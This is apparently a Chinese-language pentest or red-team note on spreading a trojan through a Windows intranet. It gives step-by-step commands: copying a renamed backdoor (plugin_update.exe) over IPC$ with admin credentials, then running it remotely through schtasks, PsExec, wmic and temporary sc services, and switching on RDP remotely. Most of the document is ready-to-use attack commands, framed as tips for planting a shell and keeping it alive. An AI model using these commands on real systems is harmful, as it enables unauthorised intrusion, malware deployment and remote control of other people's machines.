0x01 首先，想辦法把馬拷到目標機器上再說：

1、# net use \\192。168。3。168\ipc$ /user：administrator “admin！@#45”

2、# copy shell。exe \\192。168。3。168\c$\windows\temp\plugin_update。exe

0x02 利用最常規的copy［xcopy］ & schtasks（按說ipc建立以後，schtasks就不用帶賬號密碼了，尤其我這裡還是以system許可權執行［本身就不需要賬號密碼］，但實際測試中不帶就拒絕訪問，至於具體原因，暫未知，保險起見還是帶上）：

1、 # schtasks /create /tn “plugin_update” /tr c：\windows\temp\plugin_update。exe /sc once /st 10：29 /S 192。168。3。168 /RU System /u administrator /p “admin！@#45”

2、# schtasks /run /tn “plugin_update” /S 192。168。3。168 /u administrator /p “admin！@#45” 你也可以不用等，讓目標立即執行任務

3、# schtasks /F /delete /tn “plugin_update” /S 192。168。3。168 /u administrator /p “admin！@#45”

0x03 透過古老的psexec的方式（對方admin$開啟即可，簡單粗暴，退出的時候［如果你是用的互動］也許會有服務殘留，實際測試中並沒有，種馬的時候注意不要互動，不然程序會一直掛在哪裡）

1、# PsExec。exe -accepteula \\192。168。3。36 -d -u administrator -p admin c：\windows\temp\plugin_update。exe

0x04 透過wmic的方式來遠端執行任意指令［ 典型工具 winexec ］：

1、 # wmic /node：192。168。3。168 /user：administrator /password：admin！@#45 process call create “c：\windows\temp\plugin_update。exe”

2、# wmic /node：192。168。3。36 /USER：administrator /password：admin PATH win32_terminalservicesetting WHERE （__Class！=“”） CALL SetAllowTSConnections 1 遠端開啟對方rdp，08以後的系統可能不太好使

0x05 透過sc建立臨時服務的方式（記得事先建立好連線，可能需要把exe，bat先註冊一下，不然會一直報1053錯誤（哪位兄弟如果知道怎麼更好的解決，還望能告訴小弟一聲，感激不盡），但，其實也並不影響，雖然服務報錯，但馬還是會照常執行（記得shel彈回來以後馬上遷徙shell程序，動作要快，不然很快就會斷掉，具體原因暫未知），只要shell彈回來就好，用完就順手刪掉即可，關於sc的更多選項請自行檢視工具使用幫助）：

1、# net use \\192。168。3。168\ipc$ /user：administrator “admin！@#45”

2、# sc \\192。168。3。168 create “patch_update” binpath= “cmd /c

3、c：\windows\temp\plugin_update。exe” 這裡注意下等號後面的空格別漏了

4、# sc \\192。168。3。168 start “patch_update”

5、# sc \\192。168。3。168 delete “patch_update”# net use \\192。168。3。168\ipc$ /del

0x06 透過powershell的方式，暫時還有些問題，待後期解決再推上來

小結：

沒啥技術含量，簡單記錄下，留給有需要的人，搞清楚一些方法的利用前提條件就好（適合在域中或普通的win內網中用）